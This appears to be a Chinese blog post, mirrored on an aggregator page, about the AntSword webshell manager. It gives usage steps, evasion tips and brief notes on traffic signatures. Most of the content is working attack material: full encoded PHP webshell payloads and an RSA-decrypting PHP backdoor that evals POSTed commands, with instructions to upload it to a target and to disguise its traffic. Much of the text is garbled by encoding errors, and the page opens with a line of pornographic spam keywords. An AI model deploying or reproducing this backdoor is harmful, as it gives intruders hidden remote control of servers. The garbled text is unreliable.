国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?/h1>

這篇具有很好參考價值的文章主要介紹了攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

中國蟻劍是菜刀的升級版本,線現(xiàn)下主流的Webshell連接工具之一,有著較廣泛的使用,本篇文章會教給大家蟻劍的使用方法以及不同加密方式的流量特征,兼顧攻防兩端。

蟻劍下載安裝參考:中國蟻劍(antSword)下載、安裝、使用教程_蟻劍下載_攀爬的小白的博客-CSDN博客

目錄

各種加密方式對比

RSA流量加密分析

UA混淆

代理設(shè)置

插件使用

總結(jié)

各種加密方式對比

蟻劍給我們提供的加密方式由四種:

default:默認方式,不推薦

tiger=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return str_rot13($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "c8b5a";echo @asenc($output);echo "ad3f9";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

其流量特征十分清晰,ini_set(),set_time_limit(),當你看到這兩個字段時,就要小心了。

這種默認方式的返回包是明文傳輸?shù)?,可以在?shù)據(jù)包里面看到。

base64:只要防守人員有點經(jīng)驗,就會被識破

_0xe5c436e26d9c2=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIHN0cl9yb3QxMygkb3V0KTt9O2Z1bmN0aW9uIGFzb3V0cHV0KCl7JG91dHB1dD1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTtlY2hvICI3ODE4OCI7ZWNobyBAYXNlbmMoJG91dHB1dCk7ZWNobyAiMmRhYmQiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw==&tiger=@eval(@base64_decode($_POST[_0xe5c436e26d9c2]));

流量特征典型的base64,見的多了就會快速反應到。其數(shù)據(jù)返回包是base64加密

chr/chr16

tiger=@eVAl(cHr(64).ChR(105).ChR(110).ChR(105).ChR(95).ChR(115).ChR(101).ChR(116).ChR(40).ChR(34).ChR(100).ChR(105).ChR(115).ChR(112).ChR(108).ChR(97).ChR(121).ChR(95).ChR(101).ChR(114).ChR(114).ChR(111).ChR(114).ChR(115).ChR(34).ChR(44).ChR(32).ChR(34).ChR(48).ChR(34).ChR(41).ChR(59).ChR(64).ChR(115).ChR(101).ChR(116).ChR(95).ChR(116).ChR(105).ChR(109).ChR(101).ChR(95).ChR(108).ChR(105).ChR(109).ChR(105).ChR(116).ChR(40).ChR(48).ChR(41).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(123).ChR(114).ChR(101).ChR(116).ChR(117).ChR(114).ChR(110).ChR(32).ChR(115).ChR(116).ChR(114).ChR(95).ChR(114).ChR(111).ChR(116).ChR(49).ChR(51).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(41).ChR(59).ChR(125).ChR(59).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(123).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(61).ChR(111).ChR(98).ChR(95).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(111).ChR(110).ChR(116).ChR(101).ChR(110).ChR(116).ChR(115).ChR(40).ChR(41).ChR(59).ChR(111).ChR(98).ChR(95).ChR(101).ChR(110).ChR(100).ChR(95).ChR(99).ChR(108).ChR(101).ChR(97).ChR(110).ChR(40).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(56).ChR(49).ChR(56).ChR(57).ChR(99).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(64).ChR(97).ChR(115).ChR(101).ChR(110).ChR(99).ChR(40).ChR(36).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(41).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(99).ChR(102).ChR(56).ChR(51).ChR(50).ChR(34).ChR(59).ChR(125).ChR(111).ChR(98).ChR(95).ChR(115).ChR(116).ChR(97).ChR(114).ChR(116).ChR(40).ChR(41).ChR(59).ChR(116).ChR(114).ChR(121).ChR(123).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(83).ChR(67).ChR(82).ChR(73).ChR(80).ChR(84).ChR(95).ChR(70).ChR(73).ChR(76).ChR(69).ChR(78).ChR(65).ChR(77).ChR(69).ChR(34).ChR(93).ChR(41).ChR(59).ChR(105).ChR(102).ChR(40).ChR(36).ChR(68).ChR(61).ChR(61).ChR(34).ChR(34).ChR(41).ChR(36).ChR(68).ChR(61).ChR(100).ChR(105).ChR(114).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(36).ChR(95).ChR(83).ChR(69).ChR(82).ChR(86).ChR(69).ChR(82).ChR(91).ChR(34).ChR(80).ChR(65).ChR(84).ChR(72).ChR(95).ChR(84).ChR(82).ChR(65).ChR(78).ChR(83).ChR(76).ChR(65).ChR(84).ChR(69).ChR(68).ChR(34).ChR(93).ChR(41).ChR(59).ChR(36).ChR(82).ChR(61).ChR(34).ChR(123).ChR(36).ChR(68).ChR(125).ChR(9).ChR(34).ChR(59).ChR(105).ChR(102).ChR(40).ChR(115).ChR(117).ChR(98).ChR(115).ChR(116).ChR(114).ChR(40).ChR(36).ChR(68).ChR(44).ChR(48).ChR(44).ChR(49).ChR(41).ChR(33).ChR(61).ChR(34).ChR(47).ChR(34).ChR(41).ChR(123).ChR(102).ChR(111).ChR(114).ChR(101).ChR(97).ChR(99).ChR(104).ChR(40).ChR(114).ChR(97).ChR(110).ChR(103).ChR(101).ChR(40).ChR(34).ChR(67).ChR(34).ChR(44).ChR(34).ChR(90).ChR(34).ChR(41).ChR(97).ChR(115).ChR(32).ChR(36).ChR(76).ChR(41).ChR(105).ChR(102).ChR(40).ChR(105).ChR(115).ChR(95).ChR(100).ChR(105).ChR(114).ChR(40).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(41).ChR(41).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(123).ChR(36).ChR(76).ChR(125).ChR(58).ChR(34).ChR(59).ChR(125).ChR(101).ChR(108).ChR(115).ChR(101).ChR(123).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(47).ChR(34).ChR(59).ChR(125).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(34).ChR(59).ChR(36).ChR(117).ChR(61).ChR(40).ChR(102).ChR(117).ChR(110).ChR(99).ChR(116).ChR(105).ChR(111).ChR(110).ChR(95).ChR(101).ChR(120).ChR(105).ChR(115).ChR(116).ChR(115).ChR(40).ChR(34).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(103).ChR(105).ChR(100).ChR(34).ChR(41).ChR(41).ChR(63).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(112).ChR(119).ChR(117).ChR(105).ChR(100).ChR(40).ChR(64).ChR(112).ChR(111).ChR(115).ChR(105).ChR(120).ChR(95).ChR(103).ChR(101).ChR(116).ChR(101).ChR(117).ChR(105).ChR(100).ChR(40).ChR(41).ChR(41).ChR(58).ChR(34).ChR(34).ChR(59).ChR(36).ChR(115).ChR(61).ChR(40).ChR(36).ChR(117).ChR(41).ChR(63).ChR(36).ChR(117).ChR(91).ChR(34).ChR(110).ChR(97).ChR(109).ChR(101).ChR(34).ChR(93).ChR(58).ChR(64).ChR(103).ChR(101).ChR(116).ChR(95).ChR(99).ChR(117).ChR(114).ChR(114).ChR(101).ChR(110).ChR(116).ChR(95).ChR(117).ChR(115).ChR(101).ChR(114).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(112).ChR(104).ChR(112).ChR(95).ChR(117).ChR(110).ChR(97).ChR(109).ChR(101).ChR(40).ChR(41).ChR(59).ChR(36).ChR(82).ChR(46).ChR(61).ChR(34).ChR(9).ChR(123).ChR(36).ChR(115).ChR(125).ChR(34).ChR(59).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(36).ChR(82).ChR(59).ChR(59).ChR(125).ChR(99).ChR(97).ChR(116).ChR(99).ChR(104).ChR(40).ChR(69).ChR(120).ChR(99).ChR(101).ChR(112).ChR(116).ChR(105).ChR(111).ChR(110).ChR(32).ChR(36).ChR(101).ChR(41).ChR(123).ChR(101).ChR(99).ChR(104).ChR(111).ChR(32).ChR(34).ChR(69).ChR(82).ChR(82).ChR(79).ChR(82).ChR(58).ChR(47).ChR(47).ChR(34).ChR(46).ChR(36).ChR(101).ChR(45).ChR(62).ChR(103).ChR(101).ChR(116).ChR(77).ChR(101).ChR(115).ChR(115).ChR(97).ChR(103).ChR(101).ChR(40).ChR(41).ChR(59).ChR(125).ChR(59).ChR(97).ChR(115).ChR(111).ChR(117).ChR(116).ChR(112).ChR(117).ChR(116).ChR(40).ChR(41).ChR(59).ChR(100).ChR(105).ChR(101).ChR(40).ChR(41).ChR(59));

特征也很明顯,其返回包也是以明文傳輸?shù)摹?/p>

rot13

_0xb7628defadc01=@vav_frg("qvfcynl_reebef", "0");@frg_gvzr_yvzvg(0);shapgvba nfrap($bhg){erghea fge_ebg13($bhg);};shapgvba nfbhgchg(){$bhgchg=bo_trg_pbagragf();bo_raq_pyrna();rpub "no03q";rpub @nfrap($bhgchg);rpub "99nr7";}bo_fgneg();gel{$Q=qveanzr($_FREIRE["FPEVCG_SVYRANZR"]);vs($Q=="")$Q=qveanzr($_FREIRE["CNGU_GENAFYNGRQ"]);$E="{$Q}	";vs(fhofge($Q,0,1)!="/"){sbernpu(enatr("P","M")nf $Y)vs(vf_qve("{$Y}:"))$E.="{$Y}:";}ryfr{$E.="/";}$E.="	";$h=(shapgvba_rkvfgf("cbfvk_trgrtvq"))?@cbfvk_trgcjhvq(@cbfvk_trgrhvq()):"";$f=($h)?$h["anzr"]:@trg_pheerag_hfre();$E.=cuc_hanzr();$E.="	{$f}";rpub $E;;}pngpu(Rkprcgvba $r){rpub "REEBE://".$r->trgZrffntr();};nfbhgchg();qvr();&tiger=@eval(@str_rot13($_POST[_0xb7628defadc01]));

特征也很明顯,其返回包也是以明文傳輸?shù)摹?/p>

蟻劍提供的集中加密方式都不太好,很容易就會被溯源到。接下引入另外一種RSA加密

RSA流量加密分析

????????RSA加密算法是一種非對稱加密算法,所謂非對稱,就是指該算法加密和解密使用不同的密鑰,即使用加密密鑰進行加密、解密密鑰進行解密。在RAS算法中,加密密鑰(即公開密鑰)PK是公開信息,而解密密鑰(即秘密密鑰)SK是需要保密的。

? ? ? ? 在后門代碼里面存儲著公鑰,以及后門代碼

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIqhgvWlSjvyQ+GsQDp5xp7/7q
E1Bojg6rQnQmumr1FNlhgduSZL6YUq9OqKK4+Mz+EYgI2qHTJMvzYTWfV2C46NkK
E0EYeCIQlZl9c6zW9JUTv7zyHpcRpcstlcJReUcf+jlvuEi88M/5YFBeirHYL/Fy
utU0iNt88FzAbiX1+wIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
eval($cmd);

在后門代碼里面會存儲公鑰,用來解密傳過來的數(shù)據(jù),但返回數(shù)據(jù)時默認的是base64編碼。

具體操作:AntSword——編碼設(shè)置——編碼管理——RSA配置——生成,生成webshell:

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?安全

?將PHP后門代碼上傳目標即可,默認密碼是ant。

在連接時選擇自定義的加密選項:

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?安全

這樣加密有兩個缺點:

  1. webshell沒有混淆,需要自己去配置
  2. 返回數(shù)據(jù)包是base64編碼,還是很明顯,建議配合解碼器,但是需要自己寫,對我這種菜鳥很不友好。

靜態(tài)特征

Php中使用assert,eval執(zhí)行

asp使用eval

在jsp使用的是Java類加載(ClassLoader),同時會帶有base64編碼解碼等字符特征

UA混淆

可以修改UA頭,以及數(shù)據(jù)包的Body內(nèi)容進行混淆,最新版本的UA已經(jīng)可以實現(xiàn)隨機了

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?安全

?但如果想要自己修改的話,可以在上面進行修改。

代理設(shè)置

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?安全

?可以配合burpsuite進行抓包

插件使用

????????插件的話推薦一個生成hsell的插件即可。

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?安全

?可以生成多種類型的shell

攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁?安全

參考文章:

學蟻致用(二)——RSA流量免殺_limb0的博客-CSDN博客

中國蟻劍(AntSword)安裝、使用教程_丶沒胡子的貓的博客-CSDN博客

webshell使用與流量分析(含數(shù)據(jù)包)_webshell流量分析_zkzq的博客-CSDN博客

感謝幾位大佬的分享!??!

總結(jié)

蟻劍這款工具在流量加密上特征比較明顯,而且返回包多是明文,很容易在流量上就被查殺。

最后創(chuàng)作不易,求路過大佬點贊支持一下,謝謝?。。?span toymoban-style="hidden">文章來源地址http://www.zghlxwxcb.cn/news/detail-730976.html

到了這里,關(guān)于攻防兼?zhèn)洌褐袊亜κ褂弥改霞疤卣髁髁康奈恼戮徒榻B完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • [玄機]流量特征分析-蟻劍流量分析

    [玄機]流量特征分析-蟻劍流量分析

    流量特征分析-蟻劍流量分析????????題目做法及思路解析(個人分享) AntSword(蟻劍)是一款開源的網(wǎng)絡(luò)安全工具,常用于網(wǎng)絡(luò)滲透測試和攻擊。它可以遠程連接并控制被攻擊計算機,執(zhí)行命令、上傳下載文件等操作。 蟻劍與網(wǎng)站進行數(shù)據(jù)交互的過程中,發(fā)送的數(shù)據(jù)是經(jīng)

    2024年01月25日
    瀏覽(22)
  • 【網(wǎng)絡(luò)安全】文件上傳漏洞及中國蟻劍安裝

    【網(wǎng)絡(luò)安全】文件上傳漏洞及中國蟻劍安裝

    文件上傳漏洞是指由于程序員未對上傳的文件進行嚴格的驗證和過濾,而導致的用戶可以越過其本身權(quán)限向服務器上上傳可執(zhí)行的動態(tài)腳本文件。如常見的頭像上傳,圖片上傳,oa 辦公文件上傳,媒體上傳,允許用戶上傳文件,如果過濾不嚴格,惡意用戶利用文件上傳漏洞,

    2024年02月04日
    瀏覽(26)
  • Webshell工具的流量特征分析(菜刀,蟻劍,冰蝎,哥斯拉)

    Webshell工具的流量特征分析(菜刀,蟻劍,冰蝎,哥斯拉)

    使用各種的shell工具獲取到目標權(quán)限,即可進行數(shù)據(jù)操作,今天來簡要分析一下目前常使用的各類shell管理工具的流量特診,幫助藍隊同學在風險識別上快速初值 payload特征: PHP: ?php @eval($_POST[\\\'caidao\\\']);? ASP: %eval request(“caidao”)% ASP.NET: %@ Page Language=“Jscript”%%eval(Request.Item[“

    2023年04月24日
    瀏覽(17)
  • webshell管理工具的流量特征分析(菜刀、蟻劍、冰蝎、哥斯拉)

    目錄 寫在前面 菜刀 蟻劍? 冰蝎? 冰蝎2.0 冰蝎3.0? 冰蝎4.0? 哥斯拉? 菜刀、蟻劍、冰蝎、哥斯拉是常見的webshell管理工具。在攻防演練中,了解其常見webshell管理工具的流量特征對防守方來說十分重要。常見的webshell也在不斷發(fā)展以繞過安全設(shè)備waf的檢測,其流量特征也在不斷

    2024年02月13日
    瀏覽(44)
  • 滲透測試-菜刀冰蝎蟻劍哥斯拉等webshell工具及特征分析

    滲透測試-菜刀冰蝎蟻劍哥斯拉等webshell工具及特征分析

    在測試過程中,我們經(jīng)常會運到各種webshell管理工具,這里我介紹幾種常見的webshell工具給大家。 webshell就是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種代碼執(zhí)行環(huán)境,主要用于網(wǎng)站管理、服務器管理、權(quán)限管理等操作。使用方法簡單,只需上傳一個代碼文件,通過網(wǎng)址訪

    2024年02月16日
    瀏覽(21)
  • Spark初學者指南:使用指南和示例

    本文介紹了如何使用Spark處理大規(guī)模數(shù)據(jù)集,并提供了一個Scala編寫的Word Count示例,指導您從安裝和配置到編寫和運行Spark應用程序。無需擔心,即使您是Spark初學者,也可以按照本文的步驟來學習和使用Spark。 Spark是一個流行的分布式計算框架,用于處理大規(guī)模數(shù)據(jù)集。它使

    2024年02月06日
    瀏覽(35)
  • 【12】Git工具 協(xié)同工作平臺使用教程 Gitee使用指南 騰訊工蜂使用指南【Gitee】【騰訊工蜂】【Git】

    【12】Git工具 協(xié)同工作平臺使用教程 Gitee使用指南 騰訊工蜂使用指南【Gitee】【騰訊工蜂】【Git】

    tips:少量的git安裝和使用教程,更多講快速使用上手Gitee和工蜂平臺 ? ???Git - Downloads (git-scm.com) 找到對應操作系統(tǒng),對應版本,對應的位數(shù) ? 下載后根據(jù)需求自己安裝,然后用git --version驗證是否成功 ? 使用 SSH 密鑰可以讓你在與 Git 服務器進行通信時,實現(xiàn)更安全的身份

    2024年02月13日
    瀏覽(23)
  • Jmeter進階使用指南-使用斷言

    Apache JMeter是一個流行的開源負載和性能測試工具。在JMeter中,斷言(Assertions)是用來驗證響應數(shù)據(jù)是否符合預期的一個重要組件。它是對請求響應的一種檢查,如果響應不符合預期,那么斷言會標記為失敗。 以下是如何在JMeter中使用斷言的基本步驟: 添加斷言 :首先,你

    2024年02月09日
    瀏覽(24)
  • 中國蟻劍AntSword反制 RCE漏洞復現(xiàn) windows環(huán)境上反彈shell 吊打攻擊你的黑客

    中國蟻劍AntSword反制 RCE漏洞復現(xiàn) windows環(huán)境上反彈shell 吊打攻擊你的黑客

    中國蟻劍(AntSword) 是一款開源的跨平臺網(wǎng)站管理工具,它主要面向于合法授權(quán)的滲透測試安全人員以及進行常規(guī)操作的網(wǎng)站管理員。 WebShell可以理解為網(wǎng)頁中的 木馬程序 ,通過植入到你的web站點,在web頁面上的操作, 控制你的計算機 操作系統(tǒng),文件,權(quán)限,任意命令執(zhí)行。

    2024年02月13日
    瀏覽(23)
  • Polars使用指南(二)

    在上一篇文章中,我們介紹了Polars的優(yōu)勢和Polars.Series的常用API,本篇文章我們繼續(xù)介紹Polars.Series的擴展API。 對于一些特殊的數(shù)據(jù)類型,如 pl.Array、list、str 等,Polars.Series 提供了基于屬性的直接操作API,如果可以使用下述API實現(xiàn)的功能,應盡量避免使用 map_elements,因為效率

    2024年01月23日
    瀏覽(72)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包